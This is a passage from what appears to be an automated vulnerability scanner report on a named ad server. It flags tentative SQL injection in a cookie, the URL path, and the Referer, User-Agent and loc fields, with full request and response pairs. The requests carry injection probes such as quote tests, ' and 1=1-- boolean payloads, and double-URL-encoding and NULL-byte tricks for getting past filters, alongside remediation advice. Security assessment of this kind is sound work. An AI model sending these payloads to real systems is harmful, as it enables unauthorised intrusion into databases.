NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599331799 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID%00'; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18961

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2812308(i) {
var sVersion_2812308 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599331799 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID%00''; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 592

document.write("\n");
var cb = Math.random();
var d = document;
var iframe = "&fr=" + (window != top);
var ref = "";
try {
if (window != top) {
ref = "&rf="+escape(d.referrer);
}
} catch (ignore) { }

...[SNIP]...

1.3. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH%2527;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599331799 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18950

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2812308(i) {
var sVersion_2812308 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH%2527%2527;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599331799 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 426

document.write("<scr"+"ipt src=\"http://tag.contextweb.com/TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538936&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106934\">\n");
docum
...[SNIP]...

1.4. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18961

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816967(i) {
var sVersion_2816967 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1712

document.write("<scr"+"ipt type='text/javascript'>//<![CDATA[\n");
document.write("document.MAX_ct0 ='';\n");
document.write("var m3_u = (location.protocol=='https:'?'https://cas.criteo.com/delivery/a
...[SNIP]...

1.5. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1%00'
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18950

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816967(i) {
var sVersion_2816967 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1%00''
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 475

document.write('<a href="http://adserver.adtech.de/?adlink|327|2816967|0|168|AdId=6109713;BnId=3;itime=599414338;sub1=[subst];" target=_blank><img src="http://aka-cdn-ns.adtech.de/images/17/Ad6109713S
...[SNIP]...

1.6. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH [JEB2 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH

Issue detail

The JEB2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JEB2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599345982 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID'; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18902

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816968(i) {
var sVersion_2816968 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599345982 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID''; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1710

document.write("<scr"+"ipt type='text/javascript'>//<![CDATA[\n");
document.write("document.MAX_ct0 ='';\n");
document.write("var m3_u = (location.protocol=='https:'?'https://cas.criteo.com/delivery/a
...[SNIP]...

1.7. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH

Issue detail

The loc parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the loc parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599345982'%20and%201%3d1--%20 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18913

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ion\")\r\n"+
"end if";
window.execScript(sVersion_2816968, "VBScript");
return swVersion_;
}
var AT_MULTICLICK=new Array;
var AT_MULTICOUNT=new Array;
var AT_CLICKVAR=new Array;
var AT_CLICK = "http://store.nike.com/gb/en_gb/?l=shop,pdp,ctr-inline/cid-300/pid-406900&cp=EUNS_OT_FBJUL11_UK6";
var AT_IMGCLICK="";
var AT_TARGET="_blank";
var AT_MICROSITE=""; // width=xxx height=yyy
AT_MULTICLICK[1]="";
AT_MULTICLICK[2]="";
AT_MULTICLICK[3]="";
AT_MULTICLICK[4]="";
AT_MULTICLICK[5]="";
AT_MULTICLICK[6]="";
AT_MULTICLICK[7]="";
AT_MULTICLICK[8]="";
AT_MULTICLICK[9]="";
AT_CLICKVAR[0]="clickTAG";
AT_CLICKVAR[1]="clickTAG1";
AT_CLICKVAR[2]="clickTAG2";
AT_CLICKVAR[3]="clickTAG3";
AT_CLICKVAR[4]="clickTAG4";
AT_CLICKVAR[5]="clickTAG5";
AT_CLICKVAR[6]="clickTAG6";
AT_CLICKVAR[7]="clickTAG7";
AT_CLICKVAR[8]="clickTAG8";
AT_CLICKVAR[9]="clickTAG9";
AT_MULTICOUNT[1]="";
var AT_WIDTH_HEIGHT="width=468 height=60";
var AT_FLASH="http://aka-cdn-ns.adtech.de/apps/20/Ad6109716St3Sz1Sq100956575V1Id13/NikeSeitiroUK_468x60.swf";
var AT_TRANSPARENT=false;
var AT_FLASHVERSION=8;
var AT_FLASH_BGCOLOR="";
var AT_FlaQual="autohigh";
var AT_FlashClick=false;
var AT_LAYERMANUALRESIZE = false;
var AT_BASE="http://aka-cdn-ns.adtech.de/apps/20/Ad6109716St3Sz1Sq100956575V1Id13/"; // Nachladepfad fuer Flash Filme (http://.../)
var AT_IMAGE="http://aka-cdn-ns.adtech.de/apps/20/Ad6109716St3Sz1Sq100956575V1Id13/NikeSeitiroUk_468x60.gif";
var AT_TEXT="";
var AT_ALTIMAGEWIDTH = "468";
var AT_ALTIMAGEHEIGHT = "60";
var AT_ZINDEX = "0";
var AT_WMODE = "opaque";
var AT_EXPANDABLE="false"; // width:100px;height:70px; Zus?tzlich Fakepopup an position 0x0 machen
var AT_FAKEPOPUP=false;
var AT_FAKEPOPUP_left=100;
var AT_FAKEPOPUP_top=100;
var AT_FAKEPOPUP_autoclose='';
var AT_FAKEPOPUP_start_opened=true;
var AT_CURRENTDOMAIN= window.location.host;
var AT_VARSTRING;
//make variable names unique on page
var AT_MULTICLICK2816968=AT_MULTICLICK;
var AT_CLICK2816968=AT_CLICK;
var AT_TARGET2816968=AT_TARGET;
var AT_IMGCLICK2816968=AT_IMGCLICK;
AT_CLICKVAR[0]=AT_CLICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|327|2816968|
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599345982'%20and%201%3d2--%20 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18902

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ion\")\r\n"+
"end if";
window.execScript(sVersion_2816968, "VBScript");
return swVersion_;
}
var AT_MULTICLICK=new Array;
var AT_MULTICOUNT=new Array;
var AT_CLICKVAR=new Array;
var AT_CLICK = "http://www.barclays.co.uk/footballoffset";
var AT_IMGCLICK="";
var AT_TARGET="_blank";
var AT_MICROSITE=""; // width=xxx height=yyy
AT_MULTICLICK[1]="";
AT_MULTICLICK[2]="";
AT_MULTICLICK[3]="";
AT_MULTICLICK[4]="";
AT_MULTICLICK[5]="";
AT_MULTICLICK[6]="";
AT_MULTICLICK[7]="";
AT_MULTICLICK[8]="";
AT_MULTICLICK[9]="";
AT_CLICKVAR[0]="clickTAG";
AT_CLICKVAR[1]="clickTAG1";
AT_CLICKVAR[2]="clickTAG2";
AT_CLICKVAR[3]="clickTAG3";
AT_CLICKVAR[4]="clickTAG4";
AT_CLICKVAR[5]="clickTAG5";
AT_CLICKVAR[6]="clickTAG6";
AT_CLICKVAR[7]="clickTAG7";
AT_CLICKVAR[8]="clickTAG8";
AT_CLICKVAR[9]="clickTAG9";
AT_MULTICOUNT[1]="";
var AT_WIDTH_HEIGHT="width=468 height=60";
var AT_FLASH="http://aka-cdn-ns.adtech.de/apps/14/Ad6109710St3Sz1Sq101119312V0Id115/OffsetMortgage_route1_468x60_v4.swf";
var AT_TRANSPARENT=false;
var AT_FLASHVERSION=8;
var AT_FLASH_BGCOLOR="";
var AT_FlaQual="autohigh";
var AT_FlashClick=false;
var AT_LAYERMANUALRESIZE = false;
var AT_BASE="http://aka-cdn-ns.adtech.de/apps/14/Ad6109710St3Sz1Sq101119312V0Id115/"; // Nachladepfad fuer Flash Filme (http://.../)
var AT_IMAGE="http://aka-cdn-ns.adtech.de/apps/14/Ad6109710St3Sz1Sq101119312V0Id115/OffsetMortgage_route1_468x60_Backup.gif";
var AT_TEXT="";
var AT_ALTIMAGEWIDTH = "468";
var AT_ALTIMAGEHEIGHT = "60";
var AT_ZINDEX = "0";
var AT_WMODE = "opaque";
var AT_EXPANDABLE="false"; // width:100px;height:70px; Zus?tzlich Fakepopup an position 0x0 machen
var AT_FAKEPOPUP=false;
var AT_FAKEPOPUP_left=100;
var AT_FAKEPOPUP_top=100;
var AT_FAKEPOPUP_autoclose='';
var AT_FAKEPOPUP_start_opened=true;
var AT_CURRENTDOMAIN= window.location.host;
var AT_VARSTRING;
//make variable names unique on page
var AT_MULTICLICK2816968=AT_MULTICLICK;
var AT_CLICK2816968=AT_CLICK;
var AT_TARGET2816968=AT_TARGET;
var AT_IMGCLICK2816968=AT_IMGCLICK;
AT_CLICKVAR[0]=AT_CLICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|327|2816968|0|1|AdId=6109710;BnId=115;
...[SNIP]...

1.8. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH'%20and%201%3d1--%20;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599348458 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 427

e9 = new Object();
e9.size = "300x250";
document.write("\n");
document.write("<scr"+"ipt type=\"text/javascript\" src=\"http://tags.expo9.exponential.com/tags/Premierleaguecom/ROS/tags.js\">\n");
document.write("</scr"+"ipt>\n");

var adcount_2816969_1_=new Image();
adcount_2816969_1_.src="http://adserver.adtech.de/adcount|2.0|327|2816969|0|170|AdId=6638640;BnId=2;ct=2204870089;st=783;adcid=1;itime=599386577;reqtype=5;";

Request 2

GET /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH'%20and%201%3d2--%20;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599348458 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18950

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN");
       span.innerHTML = __ADTECH_CODE__;
       window.frameElement.parentNode.appendChild(span);
       __bCodeFlushed = true;
   }
}

if (typeof inFIF != "undefined") {
   document.write = function(str) {
       __ADTECH_CODE__ += str;
   };
   
   document.writeln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816969(i) {
var sVersion_2816969 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"swVersion_ = swControl_.GetVariable(\"$version\")\r\n"+
"end if";
window.execScript(sVersion_2816969, "VBScript");
return swVersion_;
}
var AT_MULTICLICK=new Array;
var AT_MULTICOUNT=new Array;
var AT_CLICKVAR=new Array;
var AT_CLICK = "http://www.barclays.co.uk/footballoffset";
var AT_IMGCLICK="";
var AT_TARGET="_blank";
var AT_MICROSITE=""; // width=xxx height=yyy
AT_MULTICLICK[1]="";
AT_MULTICLICK[2]="";
AT_MULTICLICK[3]="";
AT_MULTICLICK[4]="";
AT_MULTICLICK[5]="";
AT_MULTICLICK[6]="";
AT_MULTICLICK[7]="";
AT_MULTICLICK[8]="";
AT_MULTICLICK[9]="";
AT_CLICKVAR[0]="clickTAG";
AT_CLICKVAR[1]="clickTAG1";
AT_CLICKVAR[2]="clickTAG2";
AT_CLICKVAR[3]="clickTAG3";
AT_CLICKVAR[4]="clickTAG4";
AT_CLICKVAR[5]="clickTAG5";
AT_CLICKVAR[6]="clickTAG6";
AT_CLICKVAR[7]="clickTAG7";
AT_CLICKVAR[8]="clickTAG8";
AT_CLICKVAR[9]="clickTAG9";
AT_MULTICOUNT[1]="";
var AT_WIDTH_HEIGHT="width=300 height=250";
var AT_FLASH="http://aka-cdn-ns.adtech.de/apps/14/Ad6109710St3Sz170Sq101119310V0Id116/OffsetMortgage_route1_300x250_v7.swf";
var AT_TRANSPARENT=false;
var AT_FLASHVERSION=8;
var AT_FLASH_BGCOLOR="";
var AT_FlaQual="autohigh";
var AT_FlashClick
...[SNIP]...

1.9. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH

Issue detail

